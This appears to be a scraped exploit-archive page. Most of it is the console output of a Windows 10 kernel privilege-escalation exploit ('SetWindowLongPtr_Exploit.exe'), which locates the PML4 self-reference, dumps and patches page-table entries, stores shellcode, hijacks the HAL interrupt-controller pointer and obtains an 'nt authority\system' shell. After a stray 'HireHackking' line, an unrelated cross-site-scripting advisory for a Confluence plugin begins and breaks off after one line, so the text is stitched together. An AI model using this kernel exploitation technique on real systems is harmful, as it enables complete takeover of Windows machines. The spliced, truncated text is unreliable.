Left in Potential Array: ffffe070381c0e00
Left in Potential Array: ffffe0f0783c1e08
Left in Potential Array: ffffe170b85c2e10
Left in Potential Array: ffffe1f0f87c3e18
Left in Potential Array: ffffe271389c4e20
Left in Potential Array: ffffe2f178bc5e28
Left in Potential Array: ffffe371b8dc6e30
Left in Potential Array: ffffe3f1f8fc7e38
Left in Potential Array: ffffe472391c8e40
Left in Potential Array: ffffe4f2793c9e48
Left in Potential Array: ffffe572b95cae50
Left in Potential Array: ffffe5f2f97cbe58
Left in Potential Array: ffffe673399cce60
Left in Potential Array: ffffe6f379bcde68
Left in Potential Array: ffffe773b9dcee70
Left in Potential Array: ffffe7f3f9fcfe78
Left in Potential Array: ffffe8743a1d0e80
Left in Potential Array: ffffe8f47a3d1e88
Left in Potential Array: ffffe974ba5d2e90
Left in Potential Array: ffffe9f4fa7d3e98
Left in Potential Array: ffffea753a9d4ea0
Left in Potential Array: ffffeaf57abd5ea8
Left in Potential Array: ffffeb75badd6eb0
Left in Potential Array: ffffebf5fafd7eb8
Left in Potential Array: ffffec763b1d8ec0
Left in Potential Array: ffffecf67b3d9ec8
Left in Potential Array: ffffed76bb5daed0
Left in Potential Array: ffffedf6fb7dbed8
Left in Potential Array: ffffee773b9dcee0
Left in Potential Array: ffffeef77bbddee8
Left in Potential Array: ffffef77bbddeef0
Left in Potential Array: ffffeff7fbfdfef8
Left in Potential Array: fffff0783c1e0f00
Left in Potential Array: fffff0f87c3e1f08
Left in Potential Array: fffff178bc5e2f10
Left in Potential Array: fffff1f8fc7e3f18
Left in Potential Array: fffff2793c9e4f20
Left in Potential Array: fffff2f97cbe5f28
Left in Potential Array: fffff379bcde6f30
Left in Potential Array: fffff3f9fcfe7f38
Left in Potential Array: fffff47a3d1e8f40
Left in Potential Array: fffff4fa7d3e9f48
Left in Potential Array: fffff57abd5eaf50
Left in Potential Array: fffff5fafd7ebf58
Left in Potential Array: fffff6fb7dbedf68
Left in Potential Array: fffff77bbddeef70
Left in Potential Array: fffff7fbfdfeff78
Left in Potential Array: fffff87c3e1f0f80
Left in Potential Array: fffff8fc7e3f1f88
Left in Potential Array: fffff97cbe5f2f90
Left in Potential Array: fffff9fcfe7f3f98
Left in Potential Array: fffffa7d3e9f4fa0
Left in Potential Array: fffffafd7ebf5fa8
Left in Potential Array: fffffb7dbedf6fb0
Left in Potential Array: fffffbfdfeff7fb8
Left in Potential Array: fffffc7e3f1f8fc0
Left in Potential Array: fffffcfe7f3f9fc8
Left in Potential Array: fffffd7ebf5fafd0
Left in Potential Array: fffffdfeff7fbfd8
Left in Potential Array: fffffe7f3f9fcfe0
Left in Potential Array: fffffeff7fbfdfe8
Left in Potential Array: ffffff7fbfdfeff0
Left in Potential Array: fffffffffffffff8
Left in Final Array: fffff67b3d9ecf60
Result: fffff67b3d9ecf60
Run SetWindowLongPtr_Exploit.exe
C:\Users\qa\Desktop>SetWindowLongPtr_Exploit.exe fffff67b3d9ecf60
My PID is: 6056
Current Username: qa
PML4 Self Ref: FFFFF67B3D9ECF60
Enter to continue...

                                                                                                                         Value Self Ref = 8000000100211867
000000003D9EC000 | 67 a8 e2 61 00 00 c0 02 67 d8 d8 6b 00 00 d0 00 | g..a....g..k....
000000003D9EC010 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC020 | 67 68 81 08 01 00 90 01 00 00 00 00 00 00 00 00 | gh..............
000000003D9EC030 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC040 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC050 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC060 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC070 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC080 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC090 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC100 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC110 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC120 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC130 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC140 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC150 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC160 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC170 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC180 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC190 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC200 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC210 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC220 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC230 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC240 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC250 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC260 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC270 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC280 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC290 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC300 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC310 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC320 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC330 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC340 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC350 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC360 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC370 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC380 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC390 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC400 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC410 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC420 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC430 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC440 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC450 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC460 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC470 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC480 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC490 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC500 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC510 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC520 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC530 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC540 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC550 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC560 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC570 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC580 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC590 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC600 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC610 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC620 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC630 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC640 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC650 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC660 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC670 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC680 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC690 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC700 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC710 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC720 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC730 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC740 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC750 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC760 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC770 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC780 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC790 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7F0 | 00 00 00 00 00 00 00 00 67 08 b9 4d 00 00 60 02 | ........g..M..`.
000000003D9EC800 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC810 | 63 f8 ff 3f 01 00 00 00 63 38 88 00 00 00 00 80 | c..?....c8......
000000003D9EC820 | 63 38 88 00 00 00 00 80 63 38 88 00 00 00 00 80 | c8......c8......
000000003D9EC830 | 63 38 88 00 00 00 00 80 63 d8 ff 3f 01 00 00 00 | c8......c..?....
000000003D9EC840 | 63 b8 ff 3f 01 00 00 00 00 00 00 00 00 00 00 00 | c..?............
000000003D9EC850 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC860 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC870 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC880 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC890 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC8A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC8B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC8C0 | 63 a8 3f 0f 01 00 00 00 00 00 00 00 00 00 00 00 | c.?.............
000000003D9EC8D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC8E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC8F0 | 00 00 00 00 00 00 00 00 63 18 35 02 00 00 00 00 | ........c.5.....
000000003D9EC900 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC910 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC920 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC930 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC940 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC950 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC960 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC970 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC980 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC990 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA10 | 00 00 00 00 00 00 00 00 63 d8 47 00 00 00 00 00 | ........c.G.....
000000003D9ECA20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB20 | 00 00 00 00 00 00 00 00 63 18 8b 00 00 00 00 00 | ........c.......
000000003D9ECB30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC20 | 63 78 82 00 00 00 00 00 00 00 00 00 00 00 00 00 | cx..............
000000003D9ECC30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC50 | 63 b8 57 00 00 00 00 00 00 00 00 00 00 00 00 00 | c.W.............
000000003D9ECC60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD90 | 63 08 a9 30 01 00 00 00 63 68 c2 2a 00 00 00 00 | c..0....ch.*....
000000003D9ECDA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECDB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECDC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECDD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECDE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECDF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE60 | 63 78 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 | cx..............
000000003D9ECE70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECEA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECEB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECEC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECED0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECEE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECEF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF60 | 67 18 21 00 01 00 00 80 00 00 00 00 00 00 00 00 | g.!.............
000000003D9ECF70 | 00 00 00 00 00 00 00 00 63 10 98 00 00 00 00 00 | ........c.......
000000003D9ECF80 | 63 40 98 00 00 00 00 00 00 00 00 00 00 00 00 00 | c@..............
000000003D9ECF90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECFA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECFB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECFC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECFD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECFE0 | 63 d8 34 02 00 00 00 00 63 38 8c 00 00 00 00 00 | c.4.....c8......
000000003D9ECFF0 | 00 00 00 00 00 00 00 00 63 f0 99 00 00 00 00 00 | ........c.......

+] Selected spurious PML4E: fffff67b3d9ecf00
+] Spurious PT: fffff67b3d9e0000
+] Content pml4e fffff67b3d9ecff8: 99f063
+] Patching the Spurious Offset with 99f067
+] Content pdpte fffff67b3d9ffff8: 9a0063
+] Patching the Spurious Offset with 9a0067
+] Content pdpte fffff67b3ffffff0: 821063
+] Patching the Spurious Offset with 821067
+] Content pte fffff67fffffe800: 1967
+] Patching the Spurious Offset with 1967
Original HalpIntteruptRequest pointer: fffff80150e1fc40
+] Selected spurious PML4E: fffff67b3d9ecf08
+] Spurious PT: fffff67b3d9e1000
+] Content pml4e fffff67b3d9ecff8: 99f063
+] Patching the Spurious Offset with 99f067
+] Content pdpte fffff67b3d9ffff8: 9a0063
+] Patching the Spurious Offset with 9a0067
+] Content pdpte fffff67b3ffffff0: 821063
+] Patching the Spurious Offset with 821067
+] Content pte fffff67fffffe800: 1967
*** Patching the original location to enable NX...
+] Patching the Spurious Offset with 1967
HAL address: fffff67b3d9e1000
+] w00t: Shellcode stored at: ffffffffffd00d50
+] Selected spurious PML4E: fffff67b3d9ecf10
+] Spurious PT: fffff67b3d9e2000
+] Content pml4e fffff67b3d9ecff8: 99f063
+] Patching the Spurious Offset with 99f067
+] Content pdpte fffff67b3d9ffff8: 9a0063
+] Patching the Spurious Offset with 9a0067
+] Content pdpte fffff67b3ffffff0: 821063
+] Patching the Spurious Offset with 821067
+] Content pte fffff67fffffe800: 1967
+] Patching the Spurious Offset with 1967
Patch HalpInterruptController->HalpApicRequestInterrupt: fffff67b3d9e26e8 with ffffffffffd00d50
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\qa\Desktop>
C:\Users\qa\Desktop>whoami
nt authority\system

C:\Users\qa\Desktop>
HireHackking 
[RCESEC-2016-009] AppFusions Doxygen for Atlassian Confluence v1.3.2 renderContent() Persistent Cross-Site Scripting

RCE Security Advisory
https://www.rcesecurity.com


1. ADVISORY INFORMATION
=======================
Product:        AppFusions Doxygen for Atlassian Confluence
